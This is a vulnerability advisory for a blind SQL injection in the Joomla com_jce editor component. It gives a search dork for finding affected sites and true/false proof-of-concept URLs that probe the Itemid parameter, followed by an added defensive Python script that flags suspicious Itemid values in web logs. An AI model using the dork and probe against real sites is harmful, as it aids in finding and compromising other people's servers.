joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================
Software: joomlacontenteditor (com_jce)
Vendor: www.joomlacontenteditor.net
Vuln Type: Blind SQL Injection
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Dork: inurl:"/index.php?option=com_jce"
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
===================================================================
Description:
JCE makes creating and editing Joomla!® content easy. Add a set of tools to your
Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...
===================================================================
exploit & p0c
[!] index.php?option=com_jce&Itemid=[valid Itemid]
Example p0c
[!] http://host/index.php?option=com_jce&Itemid=8 <= True
[!] http://host/index.php?option=com_jce&Itemid=-8 <= False
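A defensive check for the request pattern above, added here as an example and not part of the original advisory: it scans web access logs for `option=com_jce` requests whose `Itemid` is not a plain positive integer. The log lines, function name and regexes are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Apr/2011:10:01:02 +0000] "GET /index.php?option=com_jce&Itemid=8 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Apr/2011:10:01:03 +0000] "GET /index.php?option=com_jce&Itemid=-8 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Apr/2011:10:05:40 +0000] "GET /index.php?option=com_content&Itemid=-8 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.77 - - [12/Apr/2011:10:09:11 +0000] "GET /index.php?option=com_jce&Itemid=8%20junk HTTP/1.1" 200 5120 "-" "curl/7.21"
192.0.2.77 - - [12/Apr/2011:10:09:12 +0000] "GET /index.php?option=com_jce&task=plugin HTTP/1.1" 200 300 "-" "curl/7.21"
"""

# Client IP, then the request target inside the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# A menu item id should be a short run of ASCII digits and nothing else.
VALID_ITEMID = re.compile(r"[0-9]{1,10}")


def suspicious_jce_requests(log_text):
    """Return (client_ip, decoded Itemid) for every com_jce request whose
    Itemid is not a plain positive integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, target = m.group(1), m.group(2)
        # parse_qs URL-decodes values and keeps repeated parameters as a list.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_jce" not in params.get("option", []):
            continue  # other components are out of scope for this check
        for value in params.get("Itemid", []):
            if not VALID_ITEMID.fullmatch(value):
                findings.append((ip, value))
    return findings


if __name__ == "__main__":
    for ip, value in suspicious_jce_requests(SAMPLE_LOG):
        print(f"{ip}: com_jce request with non-integer Itemid {value!r}")
```

Parameters sent in a POST body do not appear in access logs, so this covers query-string requests only.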
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================